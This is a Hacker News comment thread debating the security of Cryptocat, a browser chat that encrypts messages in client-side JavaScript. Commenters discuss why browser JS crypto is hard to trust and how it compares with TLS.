Hacker News new | comments | show | ask | jobs | submit login
Cryptocat: webchat with client-side encryption features (crypto.cat)
24 points by magikarp 2239 days ago | hide | past | web | 44 comments | favorite



Took me a little while to realise you set the password in the blue box above the text entry. Interesting concept though.

For those interested it uses crypto-js (http://code.google.com/p/crypto-js/).

Might want to increase the random entropy source, from what I can see it's just DateTime.

Also I'd use a better hashing algorithm than SHA1 with AES-256.

I understand the need for PBDKF2, but I'm not so sure about using the password as the key and salt.


They aren't using SHA1; they're using HMAC-SHA1. Not the same thing.

That said: this is an idiosyncratic (rekeying AES every 500ms?) and not particularly resilient cryptosystem. As a commenter said below: don't use this for anything serious. You're equally well off with a server that simply sends "plaintext" messages over TLS.


AFAIK, the server does not rekey AES every 500ms - and your suggestion to use a server over TLS opens you up to the problem of the server itself being able to read all plaintext.


The server can read all the plaintext anyways.


No it can't, that's the whole point! Are you trolling?


No, what's happening here is that that you don't actually understand the threat model for encryption code running in Javascript fed by a server, and you're getting more and more frustrated by the fact that I'm not handholding you through it.

Reasoning about security systems (click my name to see that I do that for a living) is frustrating. To see what's happening in this case, steel yourself for a headache, sit down, and think hard through all the different things that attackers can potentially influence. Then ask yourself, "what could an attacker accomplish by manipulating that thing?".


Right...


Made a test room, 'hn' (https://crypto.cat/?c=hn). Set a key, 'password'. Will leave it open in background and peek in occasionally if others want to try.


I was thinking of building something similar. The benefits of client-side encryption is that the message is entirely encrypted until it reaches the destination. Even if the cryptocat server was compromised, the message is still "safe".


No, if the server is compromised, you are thoroughly boned. In fact, there are very common vulnerabilities that don't come close to compromising the server that still destroy the security of this scheme.

Javascript cryptography is almost always a terrible idea.


"If the server is compromised [insert disastrous result here]" applies more so to many other servers serving you crypto - I feel there's the advantage of being able to verify the .js files yourself in your browser here:

<!-- cryptocat uses the crypto-js library - http://code.google.com/p/crypto-js/ --> <!-- http://crypto-js.googlecode.com/files/2.3.0-crypto-sha1-hmac... --> <script type="text/javascript" src="js/crypto.js"></script>


You can't just verify the .js file! You have to verify every line of JS code that ever hits the JS interpreter, whether it's specified directly in the source code that the author told you about or eval'd later in some random event handler. That code could come from an explicit <script> tag in the original DOM source; it could come from an event handler specified in the DOM, or set later by any other piece of JS; it could come from an Ajax request handler; in many browsers, it can even come from CSS. It can easily hide itself after it does its job, and it isn't going to look like "<!-- zero out AES key here -->".

The browser JS runtime does not provide the tools you need to verify the integrity of a cryptosystem. Full stop.

Actually, browser JS runtimes don't even provide the tools you need to safely run a cryptosystem. How do you know what intermediate values are cached by any given JS? How do you know if any given crypto function is leaving footprints in browser memory? You don't; nobody does; nobody has published the exhaustive analysis of any browser JS to support an argument either way.

Not that that matters for crypto.cat; they don't seem to care much about side channel stuff; for instance, their HMAC compare is the JS string "!=" operator.

As for "applies to so many other servers": I don't know what you're saying. You made a claim about the security properties of this application. That claim was wrong. It doesn't become right when you point out some other app that has the same flaw.


What about loading Java applet (and communicating from JS) that handles all encrypting/decrypting? Would that take care of at least the latter concern?


Yes; you could just use Bouncycastle's Java PGP implementation, which is probably the safest option.

But people hate Java, and it's increasingly disabled in browsers.


Well I thought the question was interesting because if that'd work, so would a native Web API.


A native web API would work! I think it'd be great if everyone could agree on some basic, high-level crypto functions, implemented in browser C, to expose to JS. You'd want the interface to look much more like Keyczar than crypto-js, though.


I was also wondering — I hope you don't mind — would it be considered safe to just verify signed messages using cryptojs? For example, let's say the environment (webapp) is bootstrapped using TLS, this includes the public key. Now could this application receive signed messages through different, unsecure channel and verify them safely using the public key received through the secure channel?


If it can be safe to verify the integrity of a JS cryptosystem at all, I think it's going to turn out to be tricky to do it. Like I said elsewhere on this thread, the number of ways a web page can influence the Javascript runtime is huge, and a lot of those ways are cached.


Well the integrity of the JS cryptosystem would be no worse than the integrity of the webapp itself.

I understand that one cannot trust the JS crypto for handling the private key and doing any singing & encryption because of the possibility of leaking information through side channels. That's why I was wondering if it'd be possible to use JS crypto in only one way — that is to verify messages against public key received through the secure channel.

If the JS crypto only does verification, it wouldn't matter if the _public_ key is cached, as long as it can't be arbitrarily changed by another process. If the server is taken over or there's an XSS or other client-side vulnerability the bidirectional TLS would be similarly useless anyway.


It's not the "math" of the crypto that concerns me; it's the actual integrity of the code performing it. So for instance, if you're trying to do RSA operations in JS, how do you know that none of the bindings in the current Javascript runtime have been exposed to attacker-controllable content? How do you know nothing in the runtime was fed by cached content read over straight HTTP? Or from an HTTPS server that has a DOM corruption flaw?


If any of those things can be used to affect the crypto part, then they could be also used to affect the web application itself, in the first place. I'm only looking for the level of integrity, that I can get from launching the web application over HTTPS anyway.


Is this a point that we're dancing around here? Let's resolve it: for the most part†, you're right: the things that break clientside JS web crypto are things that break (in various degrees) the web app itself. The problem with accepting this is that the point of clientside crypto is to inoculate users from the downside risks of the simple security flaws that most applications have. What's the point of sophisticated clientside crypto if it's undone by any trivial XSS flaw?

There are issues that damage clientside JS crypto that don't blow up the app itself, but they are not the core issues I'm concerning myself with here.


I am mostly interested in replacing bi-directional TLS. There are things that need to be encrypted — authentication, any authorized operations, fetching authorized content — however the majority of content that application uses is public, so the encryption is very much redundant.

Unfortunately I can't just bootstrap the application over secure channel and fetch any content over not secure channels, as it'd be trivial to then poison the application using the unencrypted communication. Take a Hacker News-like application: Let's say that news and comments can be accessed over unsecure channel and voting and authentication are performed over TLS. Even though the authorized operations are safe, the data could be poisoned over unsecure channel — for example the user-id could be manipulated and the user would end up voting securely for someone else's post. To mitigate it, all data would have to be fetched over secure channel. However currently this is all or nothing, by fetching public data over TLS, one has to pay the encryption tax — in both CPU time, as well as in disabling any caching middleware.

Of course singing HTTP messages wouldn't be just TLS-light, since the messages could be stored and kept as an evidence that the webserver has produced such a message, which is different to TLS session-based guarantees, but it should be fine for what I need. This is why I was interested to know if such an approach would not degrade the security of the web application below what bi-directional TLS could offer.

I suppose this is not the most exciting use for client-side cryptography right now…

I think the web-application are increasingly going in the direction of reinventing Java applets anyway. There are few components that are needed for that and that will be gradually introduced: 1) Application that can be installed and launched locally (e.g. more sophisticated version of Chrome Webappstore). Once you have that, you basically have RPM in browser. 2) Capabilities system that controls what and how an application can access. All the pieces are already in there: web extensions, mobile apps, etc. 3) Pluggable storage to eliminate the need for storing data on the remote server. There is LocalStorage and IndexedDB already, now it's just a matter of time till Chrome adds Google Storage, Apple adds iCloud, Ubuntu adds UbuntuOne etc.

Once you have that, the Java[Script] applets are basically back. With NaCL in the mix you could even actually run the JVM in the browser once again. So yeah, I think in the long run the client cryptography will come around. But for now I just wanted to make use of what's currently available.


This is generally a terrible idea. TLS 1.2 is the product of almost 20 years of sustained attention and adversarial testing effort, 20 years of missteps, 20 years of design decisions argued over by people clearly not limited to but including some of the best cryptosystem thinkers in the field, and it still has missteps in it.

The idea of replacing it with ad-hoc encryption at the application layer carries with it the notion that the basic problem of "taking some bundle of application data and securing it so that it is encrypted in flight" is somehow simple, and that TLS 1.2 is overkill for it. But that's not true. To a significant extent, everything TLS 1.2 does that you don't do is a vulnerability in your system. You won't see it or fully understand it; extremely competent people have gone years staring terrible vulnerabilities in TLS in the face, even after those flaws were pointed out to them, and let them pass because the real-world practical impact wasn't obvious at the time.

And this is all before you get to the point where, to avoid the overhead and complexity and inflexibility (and whatnot) of TLS 1.2, you choose to build your cryptosystem in the most hostile possible environment for cryptography: the language runtime where no operation, function, or binding can be trusted, where every symbol table is potentially corrupted by any of 10s of content sources, many of them under the control of attackers, in a runtime that is being aggressively redesigned, optimized, JIT'd, cached, and transformed for performance.

So you can see that this goal puts you out in the wilderness on two vectors: one of attempting to start from scratch on secure transport protocols, when 20 years has shown us that the simplest service models for secure transport are surprisingly hard; and the other vector being "trying to implement secure crypto in a language environment that's hostile to the concept".

Skip it. Work on something that will make people's lives better in the immediacy, instead.


> The idea of replacing it with ad-hoc encryption at the application layer

Yes, I understand that this would be a terrible idea. That is why I only intended to verify signed, public content using static key. I don't indent do any encryption in client-side JS, not even to generate session keys!


Verifying signatures under public keys is not an easier problem than encrypting data; it's actually a harder one: more things can go wrong, not less.


What do you mean? I thought if you eliminate any of the things I've mentioned previously all that is left is just checksum algorithm and some math. Note that the public key would come from the secure TLS channel, so there's no issue of obtaining and verifying one.


We're too far to the right on this thread to keep going with this, but take my word for at least this: public key signature verification is advanced number theoretic cryptography. It is actually less straightforward than somehow applying a block cipher to variable-length arrays of user data.


So does it just mean that the implementation is hard to get right? I'm all for killing off ideas, especially when it comes to cryptography, but I'd like to at least learn something in the process. Is there somewhere I can learn about everything that can go wrong with that specific process, or would I have to just try to implement this algorithms myself, to understand the risks? BTW. Thanks for everything so far; I trust you're a busy man.


A great place to start is (Google) [nigel cryptography]; for your particular question, start with the chapter "attacks on public key cryptography".


Wrong, if the cryptocat server was compromised then the source could be changed to send everything as plaintext or to send the encryption key to a third party.


Free sticker if you can tell the thread an even more plausible vulnerability, where the attacker can't directly change the source code in the .js files, that would be equally fatal to a scheme like this.


A third party can use a carefully crafted ettercap filter to force the user to download an alternate .js file


They'd need to defeat https first.


Seems useful.


Why not just have users type in a room name and password on creation...no need to set the salt after the fact.


Except that the encryption is handled with javascript (obviously). I wouldn't use this for anything serious.


Why not? AES has been implemented in javascript half a dozen times.


And? What is that evidence of?


That the implementation of an encryption library in Javascript is not a reason to mistrust services which use that library?


It isn't evidence of that. Implementation in browser JS is in fact a reason to distrust a cryptosystem.


Okay..? What difference does that make?


because... the server might send a broken .js therefore forcing your chat client into sending plain text.


Exactly, that's the point. Or a browser extension. Or various other fun things, see tptacek's conversation above.




Applications are open for YC Winter 2018

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact

Search: